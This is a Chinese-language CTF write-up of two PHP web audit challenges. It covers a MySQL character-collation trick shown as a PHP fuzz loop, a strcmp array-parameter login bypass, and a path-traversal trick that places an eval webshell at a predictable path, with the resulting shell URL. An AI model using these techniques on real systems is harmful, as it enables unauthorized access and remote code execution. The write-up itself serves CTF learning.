只会web正好又是php的审计题目,于是就把两道题都做了。大牛们都忙着破各种路由器,破各种设备去了,我也侥幸得了个第一:
第一题,没怎么截图,查看代码如下:
主要是考mysql的一个trick。就是查询出来的$row[‘id’]和$id的区别。这么说可能有点不明白,我们用一下代码fuzz一下mysql:
<?php mysql_connect("localhost","root","root"); mysql_select_db ("test"); mysql_query("set names utf8"); for($i = 0 ; $i < 256 ; $i++){ $c = chr($i); $name = mysql_real_escape_string('hehe' . $c); $sql = "SELECT * FROM `name` WHERE `name` = '{$name}'"; $row = mysql_fetch_array(mysql_query($sql)); if ($row['name'] == 'hehe') { echo "{$c} <br/>"; } }
如果在name后面加上一个字符,在mysql里查询,如果查到的和不加这个字符查出来的行相同,则输出。
得到了如下结果:
我们随便挑一个跟在adog后面提交就能得到flag了。如下:
第二题,访问pwnme.php得到如下提示:
很快就明白了是要说明在php里===和==的意义不同。我记得之前一个php的trick,我猜这里的代码是这样:strcmp($_POST[password], 'xxxx')==0。看一下php的strcmp文档就能知道:
所以传一个password[]=xxx即可得到如下页面:
访问可得到一段源码,yeah碰上我最爱的审计题了:
源码其实很简单,就是写入一个webshell,但文件名是跟当前秒数有关,所以大部分人想到要跑一下文件名。
当然,我这个人比较懒,能不能想个方法,不要跑这该死的文件名。
这道题没有过滤/和../,我可以直接做跳转,将时间作为目录名,再用../跳转到上个目录,这样我的文件就不带时间前缀了。
当然还要让php不出错,试了几次,数据包如下即可:
这样我的shell就为:http://106.120.92.162:5000/backup/".eval($_REQUEST[a]).php
不需要跑用户名。拿到shell了就读flag即可。
相关推荐: python 实现 php 的 var_dump 功能
最近在做python的web开发(原谅我的多变,好东西总想都学着。。。node.js也是),不过过程中总遇到些问题,不管是web.py还是django,开发起来确实没用php方便,毕竟存在的时间比较短,很多不完善的地方。  …
请登录后发表评论
注册